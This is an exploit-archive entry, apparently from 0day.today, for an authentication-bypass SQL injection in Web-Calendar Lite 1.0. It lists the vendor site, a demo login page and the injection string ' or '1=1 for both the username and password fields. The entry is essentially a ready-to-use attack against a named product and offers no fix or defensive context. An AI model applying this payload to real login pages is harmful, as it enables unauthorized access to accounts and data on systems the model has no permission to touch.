id: 4724
date: 01/25/2009
title: Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

===============================================================
Web-Calendar Lite 1.0 (Auth Bypass) SQL Injection Vulnerability
===============================================================


#############################################
[~]Script   :Web-Calendar Lite 1.0

[~]Site     :http://www.ewebb.it

[~]Demo     :http://www.ewebb.it/scripts/calendar_V1/index.asp
#############################################

[~]http://www.c4team.org/ [PATH] /calendar_V1/index.asp


[~]Username : ' or '1=1


[~]Password : ' or '1=1

#############################################



#  0day.today [2023-03-24]  #